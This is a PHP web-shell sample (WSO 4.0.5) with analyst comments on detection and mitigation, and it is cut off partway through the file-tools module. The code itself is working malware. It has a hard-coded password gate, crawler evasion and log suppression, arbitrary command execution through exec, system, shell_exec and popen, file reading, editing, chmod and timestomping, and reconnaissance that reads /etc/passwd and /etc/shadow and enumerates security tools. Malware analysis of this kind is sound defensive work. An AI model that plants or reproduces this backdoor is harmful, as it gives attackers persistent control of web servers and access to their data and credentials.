1<?php
// Analyst annotation: this file is a captured web-shell sample (WSO family, version string
// below). The code is kept verbatim; every comment in this listing describes behaviour,
// detection opportunities and mitigations for defenders.
2/* WSO 4.0.5 (Web Shell by HARD _LINUX) */
// Access control is a single hard-coded MD5; the author's own trailing comment identifies it
// as md5('admin'). It is compared with a loose '==' in the auth block further down.
// Detection: a bare 32-hex literal assigned to $auth_pass is a reliable indicator for this family.
3$auth_pass = "21232f297a57a5a743894a0e4a801fc3"; //admin
4$color = "#fff";
// Module run when no action is selected; the action dispatcher itself is not in this excerpt.
5$default_action = 'FilesMan';
6@define('SELF_PATH', __FILE__);
// Crawler evasion: any User-Agent containing 'Google' is answered with a 404 so the page is
// not indexed. Defender side effect: an HTTP scan that identifies as Googlebot will see a
// 404 for a file that exists on disk; verify presence on the filesystem, not over HTTP.
7if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
8 header('HTTP/1.0 404 Not Found');
9 exit;
10}
// Anti-logging and anti-timeout: errors are neither displayed nor logged and execution time
// is unlimited. The '@' prefixes throughout the file suppress warnings for the same reason.
// Detection: error_reporting(0) + ini_set('error_log', NULL) + set_time_limit(0) at the top
// of a file is a common web-shell heuristic.
11@session_start();
12@error_reporting(0);
13@ini_set('error_log',NULL);
14@ini_set('log_errors',0);
15@ini_set('max_execution_time',0);
16@set_time_limit(0);
17@define('VERSION', '4.0.5');
// Magic-quotes compatibility for PHP < 5.4. get_magic_quotes_gpc() no longer exists in PHP 8,
// so this sample as written fails on a modern runtime.
18if( get_magic_quotes_gpc() ) {
19 function stripslashes_array($array) {
20 return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
21 }
22 $_POST = stripslashes_array($_POST);
23}
// Login prompt for unauthenticated visitors. A wider list of crawler User-Agents than the
// top-of-file check gets a 404 instead of the form (same evasion goal).
// Detection: the unbranded password form with font-family:fantasy and a '>>' submit button
// is a stable page-content signature for this family.
24function printLogin() {
25 if(!empty($_SERVER['HTTP_USER_AGENT'])) {
26 $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
 // Case-insensitive alternation of the names above.
27 if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
28 header('HTTP/1.0 404 Not Found');
29 exit;
30 }
31 }
 // die() ends the request here, so nothing below this function runs for an unauthenticated caller.
32 die("<pre align=center><form method=post style='font-family:fantasy;'>Password: <input type=password name=pass style='background-color:whitesmoke;border:1px solid #FFF;'><input type=submit value='>>' style='border:none;background-color:teal;color:#fff;'></form></pre>");
33}
// Session auth gate. The session key is md5(HTTP_HOST), so one login covers one virtual host.
// Authentication is skipped entirely when $auth_pass is empty, and the check uses loose '=='
// on two hash strings rather than hash_equals(), so PHP's numeric-string comparison rules
// apply. Braces are omitted: only the first statement of each branch belongs to the if/else.
34if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
35 if( empty( $auth_pass ) ||
36 ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
37 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
38 else
39 printLogin();
// OS detection; drives path normalisation below and the command presets later in the file.
40if( strtolower( substr(PHP_OS,0,3) ) == "win" )
41 $os = 'win';
42else
43 $os = 'nix';
// Environment facts reported to the operator and reused by actionSecInfo().
44$safe_mode = @ini_get('safe_mode');
45$disable_functions = @ini_get('disable_functions');
46$home_cwd = @getcwd();
// Working directory is taken straight from the request (POST 'c'); a failed chdir() is silent.
// Mitigation: open_basedir confines chdir() and the file functions, but not spawned commands.
47if( isset( $_POST['c'] ) )
48 @chdir($_POST['c']);
49$cwd = @getcwd();
50if( $os == 'win') {
51 $home_cwd = str_replace("\\", "/", $home_cwd);
52 $cwd = str_replace("\\", "/", $cwd);
53}
// Guarantee a trailing slash so the rest of the file builds paths by plain concatenation.
54if( $cwd[strlen($cwd)-1] != '/' )
55 $cwd .= '/';
// Page chrome emitted at the top of every module. Mixes PHP, CSS and JavaScript. The JS is
// the shell's client-side transport: a hidden form 'mf' carrying (a, c, p1, p2, p3, charset)
// that every link submits via g(), plus an XMLHttpRequest path a()/sr() whose reply is
// eval()'d by processReqChange(). Detection: the "<host> - WSO <version>" <title> and the
// module menu labels built below are stable page-content signatures.
56function printHeader() {
 // Charset comes from the request; it is written into the <meta> tag and a hidden input
 // below without escaping.
57 if(empty($_POST['charset']))
58 $_POST['charset'] = "UTF-8";
59 global $color;
60 ?>
61<html><head><meta http-equiv='Content-Type' content='text/html; charset=<?=$_POST['charset']?>'><title><?=$_SERVER['HTTP_HOST']?> - WSO <?=VERSION?></title>
62<style>
63 body {background-color:#000;color:#e1e1e1;}
64 body,td,th {font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;}
65 table.info {color:#C3C3C3;background-color:#000;}
66 span,h1,a {color:<?=$color?> !important;}
67 span {font-weight:bolder;}
68 h1 {border-left:5px solid teal;padding:2px 5px;font:14pt Verdana;background-color:#222;margin:0px;}
69 div.content {padding:5px;margin-left:5px;background-color:#000;}
70 a {text-decoration:none;}
71 a:hover {text-decoration:underline;}
72 .ml1 {border:1px solid #444;padding:5px;margin:0;overflow:auto;}
73 .bigarea {width:100%;height:250px; }
74 input, textarea, select {margin:0;color:#fff;background-color:#444;border:1px solid #000; font:9pt Courier New;}
75 form {margin:0px;}
76 #toolsTbl {text-align:center;}
77 .toolsInp {width:300px}
78 .main th {text-align:left;background-color:#000;}
79 .main tr:hover{background-color:#5e5e5e}
80 .main td, th{vertical-align:middle}
81 .l1 {background-color:#444}
82 pre {font:9pt Courier New;}
83</style>
84<script>
 // Fill the hidden form; a null argument leaves that field untouched.
85 function set(a,c,p1,p2,p3,charset) {
86 if(a != null)document.mf.a.value=a;
87 if(c != null)document.mf.c.value=c;
88 if(p1 != null)document.mf.p1.value=p1;
89 if(p2 != null)document.mf.p2.value=p2;
90 if(p3 != null)document.mf.p3.value=p3;
91 if(charset != null)document.mf.charset.value=charset;
92 }
 // Full-page navigation: fill the hidden form and submit it.
93 function g(a,c,p1,p2,p3,charset) {
94 set(a,c,p1,p2,p3,charset);
95 document.mf.submit();
96 }
 // AJAX variant: serialise every hidden-form field plus ajax=true and POST it back to the
 // current URL. REQUEST_URI is written into the script without escaping.
97 function a(a,c,p1,p2,p3,charset) {
98 set(a,c,p1,p2,p3,charset);
99 var params = "ajax=true";
100 for(i=0;i<document.mf.elements.length;i++)
101 params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
102 sr('<?=$_SERVER['REQUEST_URI'];?>', params);
103 }
 // XHR with a legacy ActiveX fallback; 'req' is an implicit global shared with processReqChange().
104 function sr(url, params) {
105 if (window.XMLHttpRequest) {
106 req = new XMLHttpRequest();
107 req.onreadystatechange = processReqChange;
108 req.open("POST", url, true);
109 req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
110 req.send(params);
111 }
112 else if (window.ActiveXObject) {
113 req = new ActiveXObject("Microsoft.XMLHTTP");
114 if (req) {
115 req.onreadystatechange = processReqChange;
116 req.open("POST", url, true);
117 req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
118 req.send(params);
119 }
120 }
121 }
 // Reply format is "<length>\n<javascript>"; the first <length> characters of the remainder
 // are executed with eval(). The server side produces this shape with
 // echo strlen($temp), "\n", $temp; in the Console and Php modules.
122 function processReqChange() {
123 if( (req.readyState == 4) )
124 if(req.status == 200) {
125 //alert(req.responseText);
126 var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
127 var arr=reg.exec(req.responseText);
128 eval(arr[2].substr(0, arr[1]));
129 }
130 else alert("Request error!");
131 }
132</script>
133<head><body><div style="position:absolute;width:100%;background-color:#444;top:0;left:0;">
<!-- Hidden carrier form. 'a' and 'charset' are echoed unescaped; c and p1-p3 go through htmlspecialchars(). -->
134<form method=post name=mf style='display:none;'>
135<input type=hidden name=a value='<?=isset($_POST['a'])?$_POST['a']:''?>'>
136<input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
137<input type=hidden name=p1 value='<?=isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''?>'>
138<input type=hidden name=p2 value='<?=isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''?>'>
139<input type=hidden name=p3 value='<?=isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''?>'>
140<input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
141</form>
142<?php
 // Disk usage of the current directory; total is forced to 1 so the percentage below never divides by zero.
143 $freeSpace = @diskfreespace($GLOBALS['cwd']);
144 $totalSpace = @disk_total_space($GLOBALS['cwd']);
145 $totalSpace = $totalSpace?$totalSpace:1;
 // Builds an exploit-db.com search link from the kernel name and release for the operator.
146 $release = @php_uname('r');
147 $kernel = @php_uname('s');
148 $millink='http://www.exploit-db.com/search/?action=search&description=';
149 if( strpos('Linux', $kernel) !== false )
150 $millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
151 else
152 $millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
 // Effective uid/gid and their names; falls back to get_current_user()/getmyuid() when posix_* is absent.
153 if(!function_exists('posix_getegid')) {
154 $user = @get_current_user();
155 $uid = @getmyuid();
156 $gid = @getmygid();
157 $group = "?";
158 } else {
159 $uid = @posix_getpwuid(@posix_geteuid());
160 $gid = @posix_getgrgid(@posix_getegid());
161 $user = $uid['name'];
162 $uid = $uid['uid'];
163 $group = $gid['name'];
164 $gid = $gid['gid'];
165 }
 // Breadcrumb: one FilesMan link per path component of the current directory.
166 $cwd_links = '';
167 $path = explode("/", $GLOBALS['cwd']);
168 $n=count($path);
169 for($i=0;$i<$n-1;$i++) {
170 $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
171 for($j=0;$j<=$i;$j++)
172 $cwd_links .= $path[$j].'/';
173 $cwd_links .= "\")'>".$path[$i]."/</a>";
174 }
 // Page-charset selector options.
175 $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
176 $opt_charsets = '';
177 foreach($charsets as $item)
178 $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
179
 // Module menu (label => action). Only SecInfo, FilesTools, Console, Php and FilesMan handlers
 // are in this excerpt; the others are not visible here. 'Logout' only appears when a password
 // is set; 'Self remove' is always offered.
180 $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Port Scanner'=>'PortScanner','Bruteforce'=>'Bruteforce','Network'=>'Network','Domains'=>'Domains');
181 if(!empty($GLOBALS['auth_pass']))
182 $m['Logout'] = 'Logout';
183 $m['Self remove'] = 'SelfRemove';
184 $menu = '';
185 foreach($m as $k => $v)
186 $menu .= '<th>[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
 // Windows only: probe drive letters a-z with is_dir().
187 $drives = "";
188 if ($GLOBALS['os'] == 'win') {
189 foreach( range('a','z') as $drive )
190 if (is_dir($drive.':\\'))
191 $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
192 }
 // Info table: uname with Google and Exploit-DB lookup links, uid/user and gid/group, PHP
 // version, safe_mode state with a phpinfo link, server time, disk totals, breadcrumb, cwd
 // permissions, home link, drives, charset selector, server IP (gethostbyname of the Host
 // header) and the visitor's REMOTE_ADDR. Most values are emitted without escaping.
193 echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:'.($GLOBALS['os'] == 'win'?'<br>Drives:':'').'</span></td>'.
194 '<td><nobr>'.substr(@php_uname(), 0, 120).' <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[Exploit-DB]</a></nobr><br>'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' )<br>'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#00A8A8><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.'</td>'.
195 '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.
196 '<table cellpadding=3 cellspacing=0 width=100% style="background-color:teal;"><tr>'.$menu.'</tr></table><div>';
197}
// Bottom toolbar present on every page: change dir, read file, make dir, make file, execute
// command and multipart upload. All but the upload form route through g(), so their field
// names (c, f, d) are copied into the hidden form's c/p1/p2 rather than posted directly.
198function printFooter() {
 // Writability of the current directory, displayed next to the create/upload forms.
199 $is_writable = is_writable($GLOBALS['cwd'])?"<font color=teal>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
200?>
201</div>
202<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%">
203 <tr>
204 <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="<?=htmlspecialchars($GLOBALS['cwd']);?>"><input type=submit value=">>"></form></td>
205 <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
206 </tr>
207 <tr>
208 <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form><?=$is_writable?></td>
209 <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form><?=$is_writable?></td>
210 </tr>
211 <tr>
212 <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
<!-- Upload form posts directly as multipart (not via g()); the module name is spelled 'FilesMAn' here, and 'charset' is echoed unescaped. -->
213 <td><form method='post' ENCTYPE='multipart/form-data'>
214 <input type=hidden name=a value='FilesMAn'>
215 <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
216 <input type=hidden name=p1 value='uploadFile'>
217 <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
218 <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form><?=$is_writable?></td>
219 </tr>
220
221</table>
222</div>
223</body></html>
224<?php
225}
// Stubs returning false when the posix extension is missing, defined only if the names are
// not listed in disable_functions (presumably to avoid a declaration conflict — not verified here).
226if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
227if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
// Command-execution primitive used by every module that runs shell commands. Tries the
// execution functions in order and silently steps down to the first one still available:
// exec -> passthru -> system -> shell_exec -> popen. Mitigation: disable_functions has to
// cover all five names (plus other process-spawning functions) for this to fail closed;
// open_basedir does not constrain spawned processes. Detection: the two '↳ …' marker
// strings returned below are specific to this family.
228function ex($in) {
229 $out = '';
 // exec() fills $out with output lines, joined with "\n".
230 if(function_exists('exec')) {
231 @exec($in,$out);
232 $out = @join("\n",$out);
 // passthru()/system() write straight to the output buffer, so it is captured.
233 }elseif(function_exists('passthru')) {
234 ob_start();
235 @passthru($in);
236 $out = ob_get_clean();
237 }elseif(function_exists('system')) {
238 ob_start();
239 @system($in);
240 $out = ob_get_clean();
241 }elseif(function_exists('shell_exec')) {
242 $out = shell_exec($in);
 // Last resort: read the process pipe in 1 KiB chunks.
243 }elseif(is_resource($f = @popen($in,"r"))) {
244 $out = "";
245 while(!@feof($f))
246 $out .= fread($f,1024);
247 pclose($f);
248 }else return "↳ Unable to execute command\n";
 // Empty output is replaced by a marker, so the return value is never ''. Callers such as
 // which() treat any non-empty result as success.
249 return ($out==''?"↳ Query did not return anything\n":$out);
250}
// Human-readable byte count using 1024-based units (labelled GB/MB/KB) with two decimals;
// values below 1024 are returned as "<n> B". $s is expected to be numeric.
251function viewSize($s) {
252 if($s >= 1073741824)
253 return sprintf('%1.2f', $s / 1073741824 ). ' GB';
254 elseif($s >= 1048576)
255 return sprintf('%1.2f', $s / 1048576 ) . ' MB';
256 elseif($s >= 1024)
257 return sprintf('%1.2f', $s / 1024 ) . ' KB';
258 else
259 return $s . ' B';
260}
// Render a fileperms() mode as an ls -l style string. The high bits select the type
// character (socket, symlink, regular, block, directory, char device, fifo; 'u' when none
// match), followed by rwx triples for owner/group/other. setuid/setgid are shown as s/S
// and the sticky bit as t/T, upper case meaning the corresponding execute bit is clear.
261function perms($p) {
262 if (($p & 0xC000) == 0xC000)$i = 's';
263 elseif (($p & 0xA000) == 0xA000)$i = 'l';
264 elseif (($p & 0x8000) == 0x8000)$i = '-';
265 elseif (($p & 0x6000) == 0x6000)$i = 'b';
266 elseif (($p & 0x4000) == 0x4000)$i = 'd';
267 elseif (($p & 0x2000) == 0x2000)$i = 'c';
268 elseif (($p & 0x1000) == 0x1000)$i = 'p';
269 else $i = 'u';
 // Owner bits (0x0800 = setuid).
270 $i .= (($p & 0x0100) ? 'r' : '-');
271 $i .= (($p & 0x0080) ? 'w' : '-');
272 $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
 // Group bits (0x0400 = setgid).
273 $i .= (($p & 0x0020) ? 'r' : '-');
274 $i .= (($p & 0x0010) ? 'w' : '-');
275 $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
 // Other bits (0x0200 = sticky).
276 $i .= (($p & 0x0004) ? 'r' : '-');
277 $i .= (($p & 0x0002) ? 'w' : '-');
278 $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
279 return $i;
280}
// Permission string for $f wrapped in a colour hint: red when the PHP process cannot read
// it, white when it can read but not write, teal when it can write. fileperms() failures
// are suppressed and passed to perms() as-is.
281function viewPermsColor($f) {
282 if (!@is_readable($f))
283 return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
284 elseif (!@is_writable($f))
285 return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
286 else
287 return '<font color=#00A8A8><b>'.perms(@fileperms($f)).'</b></font>';
288}
// Fallback for PHP 4 hosts that lack scandir(). $files is only defined when readdir()
// yields at least one entry, and the directory handle is never closed.
289if(!function_exists("scandir")) {
290 function scandir($dir) {
291 $dh = opendir($dir);
292 while (false !== ($filename = readdir($dh))) {
293 $files[] = $filename;
294 }
295 return $files;
296 }
297}
// Locate a binary by running the system 'which' through ex(). Because ex() substitutes a
// '↳ …' marker for empty output, $path is non-empty even when the binary is absent, so this
// returns a truthy string whenever a command could run at all; the Userful/Danger/Downloaders
// lists in actionSecInfo() therefore indicate that 'which' executed, not that each tool exists.
298function which($p) {
299 $path = ex('which '.$p);
300 if(!empty($path))
301 return $path;
302 return false;
303}
304// Sec. Info go --------------------
// "Sec. Info" module: host reconnaissance page. Reports server software, disabled functions,
// open_basedir, safe_mode directories, cURL and database-client availability. On *nix it
// then checks readability of /etc/passwd and /etc/shadow, dumps /proc/version,
// /etc/issue.net, /etc/hosts, 'df -h' and /etc/fstab, probes for compilers/interpreters,
// host-security tools and download utilities, and can enumerate accounts by walking a uid
// range through posix_getpwuid(). On Windows it runs ver / net accounts / net user.
// Detection: the tool-name lists below are stable signatures, and a web-server worker
// reading /etc/shadow or /proc/version is an anomaly worth alerting on.
305function actionSecInfo() {
306 printHeader();
307 echo '<h1>Server security information</h1><div class=content>';
 // Nested helper, declared when the function runs: prints "label: value", using <pre> for
 // multi-line values. Values are echoed without escaping.
308 function showSecParam($n, $v) {
309 $v = trim($v);
310 if($v) {
311 echo '<span>'.$n.': </span>';
312 if(strpos($v, "\n") === false)
313 echo $v.'<br>';
314 else
315 echo '<pre class=ml1>'.$v.'</pre>';
316 }
317 }
318
319 showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
320 showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
321 showSecParam('Open base dir', @ini_get('open_basedir'));
322 showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
323 showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
324 showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
 // Database client extensions detected by function presence.
325 $temp=array();
326 if(function_exists('mysql_get_client_info'))
327 $temp[] = "MySql (".mysql_get_client_info().")";
328 if(function_exists('mssql_connect'))
329 $temp[] = "MSSQL";
330 if(function_exists('pg_connect'))
331 $temp[] = "PostgreSQL";
332 if(function_exists('oci_connect'))
333 $temp[] = "Oracle";
334 showSecParam('Supported databases', implode(', ', $temp));
335 echo '<br>';
336
337 if( $GLOBALS['os'] == 'nix' ) {
 // 'Danger' is the operator's list of AV/HIDS/firewall/integrity tools to watch for.
338 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
339 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
340 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
341 showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
342 showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
343 showSecParam('OS version', @file_get_contents('/proc/version'));
344 showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
 // Command-based probes are skipped under safe_mode. Each which() call spawns a process;
 // see which() for why these lists are not a reliable presence check.
345 if(!$GLOBALS['safe_mode']) {
346 echo '<br>';
347 $temp=array();
348 foreach ($userful as $item)
349 if(which($item)){$temp[]=$item;}
350 showSecParam('Userful', implode(', ',$temp));
351 $temp=array();
352 foreach ($danger as $item)
353 if(which($item)){$temp[]=$item;}
354 showSecParam('Danger', implode(', ',$temp));
355 $temp=array();
356 foreach ($downloaders as $item)
357 if(which($item)){$temp[]=$item;}
358 showSecParam('Downloaders', implode(', ',$temp));
359 echo '<br/>';
360 showSecParam('Hosts', @file_get_contents('/etc/hosts'));
361 showSecParam('HDD space', ex('df -h'));
362 showSecParam('Mount options', @file_get_contents('/etc/fstab'));
 // Account enumeration form: from/to uids are posted as p2/p3; the loop below mutates $_POST['p2'].
363 echo '<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
364 if (isset ($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) {
365 $temp = "";
366 for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
367 $uid = @posix_getpwuid($_POST['p2']);
368 if ($uid)
369 $temp .= join(':',$uid)."\n";
370 }
371 echo '<br/>';
372 showSecParam('Users', $temp);
373 }
374 }
375 } else {
376 showSecParam('OS Version',ex('ver'));
377 showSecParam('Account Settings',ex('net accounts'));
378 showSecParam('User Accounts',ex('net user'));
379 }
380 echo '</div>';
381 printFooter();
382}
383// Sec. Info end --------------------
384// File tools go -----------------------
// "File tools" module: per-file operations on the path in p1, sub-action in p2, argument in
// p3. Before any HTML is sent, 'download' streams the file (gzip output buffer,
// Content-Disposition from basename) and exits, and 'mkfile' creates an empty file then
// switches to 'edit'. The remaining sub-actions are view, highlight, chmod, edit, hexdump,
// rename and touch. There is no path restriction beyond PHP's own (open_basedir).
// Forensics note: 'touch' sets mtime and atime to an operator-chosen time (timestomping);
// on POSIX filesystems ctime cannot be set this way, so a ctime newer than mtime is the tell.
385function actionFilesTools() {
 // p1 is URL-decoded once more; the rename/paste links elsewhere build it with urlencode().
386 if( isset($_POST['p1']) )
387 $_POST['p1'] = urldecode($_POST['p1']);
 // Download branch: ends the request. The directory case is an empty stub.
388 if(@$_POST['p2']=='download') {
389 if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
390 ob_start("ob_gzhandler", 4096);
391 header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
392 if (function_exists("mime_content_type")) {
393 $type = @mime_content_type($_POST['p1']);
394 header("Content-Type: ".$type);
395 }
396 $fp = @fopen($_POST['p1'], "r");
397 if($fp) {
398 while(!@feof($fp))
399 echo @fread($fp, 1024);
400 fclose($fp);
401 }
402 } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
403 }
404 exit;
405 }
 // mkfile: create only if absent, then fall into the 'edit' view below.
406 if( @$_POST['p2'] == 'mkfile' ) {
407 if(!file_exists($_POST['p1'])) {
408 $fp = @fopen($_POST['p1'], 'w');
409 if($fp) {
410 $_POST['p2'] = "edit";
411 fclose($fp);
412 }
413 }
414 }
415 printHeader();
416 echo '<h1>File tools</h1><div class=content>';
417 if( !file_exists(@$_POST['p1']) ) {
418 echo 'File not exists';
419 printFooter();
420 return;
421 }
 // Owner and group names; both lookups are keyed on fileowner().
422 $uid = @posix_getpwuid(@fileowner($_POST['p1']));
423 $gid = @posix_getgrgid(@fileowner($_POST['p1']));
424 echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
425 echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
426 if( empty($_POST['p2']) )
427 $_POST['p2'] = 'view';
 // Directories only get chmod/rename/touch.
428 if( is_file($_POST['p1']) )
429 $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
430 else
431 $m = array('Chmod', 'Rename', 'Touch');
432 foreach($m as $v)
433 echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
434 echo '<br><br>';
435 switch($_POST['p2']) {
 // view: raw contents, HTML-escaped, in 1 KiB chunks.
436 case 'view':
437 echo '<pre class=ml1>';
438 $fp = @fopen($_POST['p1'], 'r');
439 if($fp) {
440 while( !@feof($fp) )
441 echo htmlspecialchars(@fread($fp, 1024));
442 @fclose($fp);
443 }
444 echo '</pre>';
445 break;
 // highlight: highlight_file() output with <span> swapped for <font> to match the page CSS.
446 case 'highlight':
447 if( is_readable($_POST['p1']) ) {
448 echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
449 $code = highlight_file($_POST['p1'],true);
450 echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
451 }
452 break;
 // chmod: p3 is a digit string read as octal and converted to an integer by hand; on
 // success a script reloads the page with p3 cleared.
453 case 'chmod':
454 if( !empty($_POST['p3']) ) {
455 $perms = 0;
456 for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
457 $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
458 if(!@chmod($_POST['p1'], $perms))
459 echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
460 else
461 die('<script>g(null,null,null,null,"")</script>');
462 }
463 echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
464 break;
 // edit: p3 is written verbatim with file_put_contents(), then the file is re-read into the textarea.
465 case 'edit':
466 if( !is_writable($_POST['p1'])) {
467 echo 'File isn\'t writeable';
468 break;
469 }
470 if( !empty($_POST['p3']) ) {
471 @file_put_contents($_POST['p1'],$_POST['p3']);
472 echo 'Saved!<br><script>document.mf.p3.value="";</script>';
473 }
474 echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>';
475 $fp = @fopen($_POST['p1'], 'r');
476 if($fp) {
477 while( !@feof($fp) )
478 echo htmlspecialchars(@fread($fp, 1024));
479 @fclose($fp);
480 }
481 echo '</textarea><input type=submit value=">>"></form>';
482 break;
 // hexdump: whole file in memory; 32 bytes per row with offset, hex and printable columns
